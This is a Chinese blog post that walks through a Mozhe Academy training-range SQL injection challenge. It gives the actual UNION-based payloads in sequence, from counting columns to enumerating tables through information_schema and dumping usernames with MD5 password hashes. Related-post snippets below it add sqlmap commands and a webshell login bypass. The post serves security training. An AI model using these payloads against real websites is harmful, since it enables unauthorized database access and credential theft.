墨者学院SQL注入解题

最新推荐文章于 2023-05-04 15:20:40 发布
最新推荐文章于 2023-05-04 15:20:40 发布
阅读量1.7k 收藏
点赞数 7
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46111881/article/details/109539347
版权

一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。

ZJH_12138
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
墨者学院解题思路-密码学加解密实训(JavaScript分析)+代码分析详解
伪娘+
04-05 519
墨者学院解题思路-密码学加解密实训(JavaScript分析)+代码分析详解 背景介绍 一个最普通的HTML页面,可能也会存在信息泄露。查看一下页面源代码吧 实训目标 1、了解查看页面源代码; 2、代码分析; 解题方向 查看HTML页面的源代码。 思路:主要是分析代码,以下是代码详细解释。 提示里说看源代码,所以右键查看源代码,发现主要是JavaScript里的判定。 <script l...
墨者学院解题思路之电子数据取证-流量分析(第1题)+wireshak导出图片、视频等文件
伪娘+
04-04 1479
墨者学院解题思路之电子数据取证-流量分析(第1题) +wireshak导出图片、视频等文件 背景介绍 某web安全工程师在网络中捕获到一段可疑流量,发现有人将机密数据隐藏在图片中传输了出去,你能分析出其中的奥秘吗? 实训目标 1、掌握“wireshark”的基本使用方法; 2、了解数据在网络中传输的过程和协议; 解题方向 使用“wireshark”过滤语句过滤流量。 思路:wireshark是分析...
墨者学院—CMS系统漏洞分析溯源(第2题)—3种解法详细介绍
ploto_cs的博客
10-13 750
解法一 解题方法: 使用一句话木马进行连接 操作步骤: 1.对网址进行探测 2.发现后台版本文件robots.txt 发现CMS为 PHPCMS v9 后台登录页面为 admin.php 3.浏览 自动填入密码 浏览源码可以发现密码为:I@vH@U$9n8* 也可以将源码中密码的字段名由password改为text 4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7题)存在相同的文件上传漏洞 原文回顾:https://blog.csdn.net/ploto_cs/article/details/
墨者学院—SQL手工注入漏洞测试(MySQL数据库)解题
weixin_42453864的博客
08-02 352
墨者学院—SQL手工注入漏洞测试(MySQL数据库)解题过程 ** 实验目的: ** 实验过程: 打开后,点“点击访问” 点击上图的红色标注“关于平台停机维护的通知”,打开如下: 对于上图红色标注处,我们开始手工sql注入过程: 判断注入:猜解列名数量(字段数) order by x 错误与正常的正常值 219.153.49.228:48354/new_list.php?id=1 order by 4 ...
墨者学院简单sql注入
weixin_55885866的博客
05-04 80
6.information_schema.tables:记录所有表 information_schema.colums:记录所有字段。id=1 and 1=2 判断是否存在注入。4查看数据库版本,数据库名称,数据库用户。group_concat()查看。3.union 查看回显。5查看操作系统和当前用户。查看数据库对应的表名。
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 417
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4310
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1696
在MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6896
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)
weixin_36145482的博客
02-05 250
0x00.题目描述:背景介绍最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。实训目标1、熟练掌握留言板的工作原理;2、善用burp抓取数据包;解题方向抓取数据包加以分析。0x01.解题思路:靶场环境:主界面查看删除链接为:http://219.153.49.228:45611/sqli_del.php?id=65经过...
墨者学院-SQL注入漏洞测试(登录绕过)
JimWu的博客
09-04 1206
SQL注入漏洞测试(登录绕过) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器 1.打开靶场,在用户名中输入1’,显示查询失败,证明存在字符型注入。 2.返回登录页面,用户名输入1’ or 1=1#,密码随意,不填也行。 3.成功登录,获取key。 ...
墨者学院CTF(SQL注入漏洞测试(参数加密))
痴人说梦梦中人
08-10 5563
靶场地址:https://www.mozhe.cn/bug/detail/SjRRVFpOQWlLWDBJd3hzNGY5cFBiQT09bW96aGUmozhe 1. 靶场截图: 2. 目录扫描 访问可得new目录下list.php源码,即在此处存在注入漏洞 3. 代码审计 <?php header('content-type:text/html;charset=utf-8'); //发起...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4117
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院 靶场练习(一) SQL注入
a519395243的博客
12-20 8047
墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715   进来点击公告   sqlmap 用于 mysql注入的步骤: 1:查找数据库 ./sqlmap.py ...
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值